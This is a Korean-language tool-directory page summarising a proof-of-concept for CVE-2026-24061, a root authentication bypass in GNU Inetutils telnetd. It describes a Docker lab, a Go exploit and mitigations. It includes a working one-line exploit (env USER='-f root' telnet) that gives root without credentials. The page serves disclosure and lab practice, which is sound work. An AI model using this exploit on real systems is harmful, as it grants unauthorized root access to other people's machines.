Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24061 — GNU Inetutils telnetd 인증 우회(CVE-2026-24061)에 대한 개념 증명 익스플로잇으로, Docker 랩 설정 및 Go PoC를 포함합니다. NEW-ENVIRON 옵션을 악용하여 루트 셸을 획득합니다. | Kitploit
도구/GitHubGitHub/chocapikk/cve-2026-24061
Authentication & AuthorizationVulnerability AnalysisExploitationNetwork SecurityPenetration TestingLearning & EducationLabs & Practice
GitHubchocapikk/cve-2026-24061

CVE-2026-24061

GNU Inetutils telnetd 인증 우회(CVE-2026-24061)에 대한 개념 증명 익스플로잇으로, Docker 랩 설정 및 Go PoC를 포함합니다. NEW-ENVIRON 옵션을 악용하여 루트 셸을 획득합니다.

저장소 보기
1237개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-24061

GNU Inetutils telnetd 원격 인증 우회

진심으로, 2026년에 telnet? 여러분, 이제 그만 넘어갈 때입니다. SSH는 1995년부터 존재했습니다. 🤦

설명

GNU Inetutils telnetd의 치명적인 인증 우회 취약점으로, 버전 1.9.3부터 2.7까지 영향을 받습니다.

이 취약점은 NEW-ENVIRON telnet 옵션을 악용하여 login(1)에 악의적인 인자를 주입합니다. 공격자는 telnet 프로토콜을 통해 USER=-f root를 설정하여 인증을 우회하고 자격 증명 없이 root 셸을 얻을 수 있습니다.

영향을 받는 버전

  • GNU Inetutils 1.9.3 - 2.7

기술적 세부 사항

telnet 프로토콜은 클라이언트가 서버로 환경 변수를 보낼 수 있게 하는 NEW-ENVIRON 옵션(RFC 1572)을 지원합니다. telnetd 데몬은 USER 변수를 인자로 login(1)에 전달합니다.

USER=-f root를 보내면 값은 다음과 같이 해석됩니다:

  • -f 플래그: 인증 건너뜀(신뢰된 호스트)
  • root: 대상 사용자

이로 인해 login -f root가 실행되어 즉시 root 접근 권한을 부여합니다.

PoC는 IAC WILL ECHO(0xff 0xfb 0x01)를 확인하여 악용 성공 여부를 감지합니다. 이는 셸 접근이 허용될 때 서버가 보내는 프로토콜 신호입니다.

실습 환경 구성

root@kitploit:~
# Build and run the vulnerable telnetd container
docker compose up --build -d

# Test the exploit
go run poc.go 127.0.0.1 2323

익스플로잇

root@kitploit:~
# Using the Go PoC (with interactive shell)
go run poc.go <target> <port>

# Simple PoC using standard telnet client
env USER='-f root' telnet -a <target> <port>

완화 조치

  • 2026년에 telnet 사용을 정말로 중단하세요 🙏
  • 대신 SSH를 사용하세요 (이제 31년이나 된 기술인데, 저는 95년에도 태어나지 않았어요 ㅋㅋ)
  • 패치된 버전의 GNU Inetutils로 업그레이드하세요
  • 방화벽 규칙으로 telnet 접근을 제한하세요

파일

  • poc.go - 대화형 셸을 포함한 Go 익스플로잇
  • Dockerfile - 취약한 telnetd 컨테이너
  • docker-compose.yml - 실습 환경 오케스트레이션

참고 자료

  • 권고: https://www.openwall.com/lists/oss-security/2026/01/20/2
  • GNU Inetutils: https://www.gnu.org/software/inetutils/
  • RFC 1572 (NEW-ENVIRON): https://tools.ietf.org/html/rfc1572

크레딧

  • LeakIX Research Team
도구 다운로드